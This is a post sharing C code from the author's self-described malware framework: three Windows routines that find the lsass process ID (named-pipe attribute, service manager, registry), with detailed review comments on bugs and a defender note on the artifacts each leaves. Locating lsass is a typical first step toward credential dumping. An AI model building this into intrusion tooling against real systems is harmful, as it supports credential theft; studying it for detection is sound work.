This is code I developed for my malware framework. I want to share some code snippets here. This research originates from MODEXP.
// Generic helper: return a module handle for DllName, loading the DLL only if it is not already loaded.
/*
 * Return a module handle for DllName.
 *
 * If the project helper IsDllLoadedW reports the DLL as not loaded, the
 * handle comes from LoadLibraryW; otherwise it comes from the project helper
 * GetModuleHandleEx2W.  Both branches assign hModule, so it is never read
 * uninitialized.
 *
 * @param DllName  Wide-string DLL name passed straight through to the helpers.
 * @return         The handle from whichever branch ran; NULL when that call
 *                 failed (presumably both helpers return NULL on failure —
 *                 GetModuleHandleEx2W is not visible here, confirm).
 *
 * NOTE(review): the two branches may not be equivalent from the caller's
 * point of view — a handle obtained via LoadLibraryW normally needs a
 * matching FreeLibrary, while a GetModuleHandle-style lookup does not.
 * Callers below never release the handle, so no leak beyond process lifetime
 * is visible here, but the ownership contract is undocumented.
 */
HMODULE TryLoadDllMultiMethodW(_In_ PWCHAR DllName)
{
HMODULE hModule;
if (!IsDllLoadedW(DllName))
hModule = LoadLibraryW(DllName);
else
hModule = GetModuleHandleEx2W(DllName);
return hModule;
}
// Method 1 - get the lsass PID from the lsass named pipe
/*
 * Resolve the PID of the process serving the \Device\NamedPipe\lsass pipe.
 *
 * Steps:
 *   1. obtain a handle to ntdll.dll through TryLoadDllMultiMethodW;
 *   2. resolve NtOpenFile, NtFsControlFile and NtClose with the project's
 *      GetProcAddressA (its semantics are not visible here);
 *   3. open the pipe for FILE_READ_ATTRIBUTES with FILE_SHARE_READ;
 *   4. issue FSCTL_PIPE_GET_PIPE_ATTRIBUTE with the attribute name
 *      "ServerProcessId", which writes a DWORD into ProcessId.
 *
 * @return  The value written into ProcessId (initialized to ERROR_SUCCESS,
 *          i.e. 0), or (DWORD)-1 when ntdll or one of the three exports
 *          could not be resolved.
 *
 * NOTE(review): the failure sentinels are inconsistent.  The early returns
 * yield -1 (0xFFFFFFFF in a DWORD) while a failed NtOpenFile/NtFsControlFile
 * falls through to the cleanup label and returns ProcessId, which is still 0
 * unless the FSCTL partially wrote it.  Callers therefore have to test for
 * both 0 and (DWORD)-1.  The other two methods in this file return 0 on
 * every failure path.
 *
 * NOTE(review): hHandle starts as INVALID_HANDLE_VALUE but the cleanup
 * guard is `if (hHandle)`, which is true for INVALID_HANDLE_VALUE.  If
 * NtOpenFile fails without writing hHandle, NtClose is called on
 * INVALID_HANDLE_VALUE — harmless at worst, a stray close of the pseudo
 * handle at best; initializing hHandle to NULL would match the guard.
 *
 * Defender note: the observable side effect of this routine is a file open
 * on \Device\NamedPipe\lsass followed by a pipe-attribute FSCTL; the
 * registry and SCM methods below touch different artifacts.
 */
DWORD MpfGetLsaPidFromNamedPipe(VOID)
{
UNICODE_STRING Pipe = { 0 };
NTOPENFILE NtOpenFile = NULL;
NTFSCONTROLFILE NtfsControlFile = NULL;
NTCLOSE NtClose = NULL;
HMODULE hModule = NULL;
IO_STATUS_BLOCK IoBlock = { 0 };
OBJECT_ATTRIBUTES Attributes = { 0 };
DWORD ProcessId = ERROR_SUCCESS;
/* Sentinel does not match the `if (hHandle)` guard in the cleanup path — see header note. */
HANDLE hHandle = INVALID_HANDLE_VALUE;
NTSTATUS Status = STATUS_SUCCESS;
/* Pipe attribute name consumed by FSCTL_PIPE_GET_PIPE_ATTRIBUTE; length passed includes the NUL. */
LPSTR InputBuffer = (LPSTR)"ServerProcessId";
hModule = TryLoadDllMultiMethodW((PWCHAR)L"ntdll.dll");
if (hModule == NULL)
return -1;
NtOpenFile = (NTOPENFILE)GetProcAddressA((DWORD64)hModule, "NtOpenFile");
NtfsControlFile = (NTFSCONTROLFILE)GetProcAddressA((DWORD64)hModule, "NtFsControlFile");
NtClose = (NTCLOSE)GetProcAddressA((DWORD64)hModule, "NtClose");
if (!NtOpenFile || !NtfsControlFile || !NtClose)
return -1;
RtlInitUnicodeString(&Pipe, L"\\Device\\NamedPipe\\lsass");
InitializeObjectAttributes(&Attributes, &Pipe, OBJ_CASE_INSENSITIVE, 0, NULL);
/* Attribute-only access; nothing is read from or written to the pipe itself. */
Status = NtOpenFile(&hHandle, FILE_READ_ATTRIBUTES, &Attributes, &IoBlock, FILE_SHARE_READ, NULL);
if (!NT_SUCCESS(Status))
goto EXIT_ROUTINE;
/* Output buffer is the DWORD ProcessId; no check that IoBlock.Information == sizeof(DWORD) afterwards. */
Status = NtfsControlFile(hHandle, NULL, NULL, NULL, &IoBlock, FSCTL_PIPE_GET_PIPE_ATTRIBUTE, InputBuffer, (ULONG)StringLengthA(InputBuffer) + 1, &ProcessId, sizeof(DWORD));
if (!NT_SUCCESS(Status))
goto EXIT_ROUTINE; /* falls into the label either way; the jump is redundant */
EXIT_ROUTINE:
if (hHandle)
NtClose(hHandle);
return ProcessId;
}
// Method 2 - get the lsass PID from the service control manager
/*
 * Resolve the lsass PID by querying the "samss" service through the SCM.
 *
 * Connects to the local service control manager with SC_MANAGER_CONNECT,
 * opens the "samss" service with SERVICE_QUERY_STATUS, and reads
 * SERVICE_STATUS_PROCESS.dwProcessId via QueryServiceStatusEx with
 * SC_STATUS_PROCESS_INFO.  Both handles are released on every path through
 * the EXIT_ROUTINE label.
 *
 * @return  dwProcessId of the samss service on success; 0 (ERROR_SUCCESS)
 *          if the SCM or the service could not be opened or the query
 *          failed.  Unlike MpfGetLsaPidFromNamedPipe this routine never
 *          returns -1, so 0 is its only failure value.
 *
 * NOTE(review): the documented API lists the process-info query as needing
 * SERVICE_QUERY_STATUS, which is what is requested here; if a stopped
 * service is ever queried, dwProcessId would be 0 as well, so a 0 return is
 * ambiguous between "failed" and "not running" — verify on the caller side.
 */
DWORD MpfGetLsaPidFromServiceManager(VOID)
{
SC_HANDLE Manager = NULL, ServiceHandle = NULL;
DWORD ProcessId = ERROR_SUCCESS, BytesNeeded = ERROR_SUCCESS;
SERVICE_STATUS_PROCESS ServiceStatus = { 0 };
Manager = OpenSCManagerW(NULL, NULL, SC_MANAGER_CONNECT);
if (Manager == NULL)
return 0;
ServiceHandle = OpenServiceW(Manager, L"samss", SERVICE_QUERY_STATUS);
if (ServiceHandle == NULL)
goto EXIT_ROUTINE;
/* BytesNeeded is required by the API but its value is not used afterwards. */
if(!QueryServiceStatusEx(ServiceHandle, SC_STATUS_PROCESS_INFO, (LPBYTE)&ServiceStatus, sizeof(ServiceStatus), &BytesNeeded))
goto EXIT_ROUTINE;
ProcessId = ServiceStatus.dwProcessId;
EXIT_ROUTINE:
if(ServiceHandle)
CloseServiceHandle(ServiceHandle);
if (Manager)
CloseServiceHandle(Manager);
return ProcessId;
}
// Method 3 - get the lsass PID from the registry
/*
 * Resolve the lsass PID from the LsaPid value under
 * \Registry\Machine\SYSTEM\CurrentControlSet\Control\Lsa.
 *
 * Steps:
 *   1. look up an already-loaded ntdll.dll with GetModuleHandleW (note this
 *      method does not use TryLoadDllMultiMethodW like method 1 does);
 *   2. resolve NtOpenKey, NtQueryValueKey and NtClose through the project's
 *      GetProcAddressA;
 *   3. open the Lsa key with KEY_QUERY_VALUE;
 *   4. query "LsaPid" as KeyValuePartialInformation into a stack buffer and
 *      read the first DWORD of the Data member.
 *
 * @return  The DWORD found in the value's data; 0 (ERROR_SUCCESS) on any
 *          failure — the early-exit paths all fall through to EXIT_ROUTINE
 *          with LsassPid untouched.
 *
 * NOTE(review): the buffer size `sizeof(KEY_VALUE_INFORMATION_CLASS) *
 * sizeof(DWORD)` is the product of two unrelated sizes (an enum and a
 * DWORD), which is exactly what the suppressed MSVC analysis warning C6260
 * flags.  With a 4-byte enum it evaluates to 16 bytes, enough for the
 * 12-byte KEY_VALUE_PARTIAL_INFORMATION header plus one DWORD, so it works
 * by coincidence; a clearer form would be
 * `sizeof(KEY_VALUE_PARTIAL_INFORMATION) + sizeof(DWORD)` or
 * `FIELD_OFFSET(KEY_VALUE_PARTIAL_INFORMATION, Data) + sizeof(DWORD)`.
 *
 * NOTE(review): the read of ValueObject->Data[0] is not guarded by a check
 * of ValueObject->Type == REG_DWORD or ValueObject->DataLength >=
 * sizeof(DWORD).  The query only succeeds when the data fits the buffer, so
 * the read stays in bounds, but a value of another type would be
 * misinterpreted silently.
 *
 * NOTE(review): dwDispose is declared and never used.
 */
DWORD MpfGetLsaPidFromRegistry(VOID)
{
NTOPENKEY NtOpenKey = NULL;
NTQUERYVALUEKEY NtQueryValueKey = NULL;
NTCLOSE NtClose = NULL;
UNICODE_STRING LsaRegistryPath = { 0 };
UNICODE_STRING LsaValue = { 0 };
OBJECT_ATTRIBUTES Attributes = { 0 };
HANDLE hKey = NULL;
NTSTATUS Status = STATUS_SUCCESS;
HMODULE hModule = NULL;
DWORD LsassPid = ERROR_SUCCESS;
/* 16 bytes on a 4-byte enum: KEY_VALUE_PARTIAL_INFORMATION header (12) + one DWORD of data — see header note. */
UCHAR Buffer[sizeof(KEY_VALUE_INFORMATION_CLASS) * sizeof(DWORD)] = { 0 };
PKEY_VALUE_PARTIAL_INFORMATION ValueObject = (PKEY_VALUE_PARTIAL_INFORMATION)Buffer;
DWORD BufferLength = 0;
/* Unused. */
PDWORD dwDispose = NULL;
hModule = GetModuleHandleW(L"ntdll.dll");
if (hModule == NULL)
goto EXIT_ROUTINE;
NtOpenKey = (NTOPENKEY)GetProcAddressA((DWORD64)hModule, "NtOpenKey");
NtQueryValueKey = (NTQUERYVALUEKEY)GetProcAddressA((DWORD64)hModule, "NtQueryValueKey");
NtClose = (NTCLOSE)GetProcAddressA((DWORD64)hModule, "NtClose");
if (!NtOpenKey || !NtQueryValueKey || !NtClose)
goto EXIT_ROUTINE;
RtlInitUnicodeString(&LsaRegistryPath, L"\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\Lsa");
RtlInitUnicodeString(&LsaValue, L"LsaPid");
InitializeObjectAttributes(&Attributes, &LsaRegistryPath, OBJ_CASE_INSENSITIVE, NULL, NULL);
Status = NtOpenKey(&hKey, KEY_QUERY_VALUE, &Attributes);
if (!NT_SUCCESS(Status))
goto EXIT_ROUTINE;
/* C6260 ("sizeof * sizeof") is suppressed here rather than fixed — see header note. */
#pragma warning( push )
#pragma warning( disable : 6260)
Status = NtQueryValueKey(hKey, &LsaValue, KeyValuePartialInformation, Buffer, (sizeof(KEY_VALUE_INFORMATION_CLASS) * sizeof(DWORD)), &BufferLength);
if (!NT_SUCCESS(Status))
goto EXIT_ROUTINE;
#pragma warning( pop )
/* No Type/DataLength validation before the read; in bounds only because the query succeeded. */
LsassPid = *(PDWORD)&ValueObject->Data[0];
EXIT_ROUTINE:
if (hKey)
NtClose(hKey);
return LsassPid;
}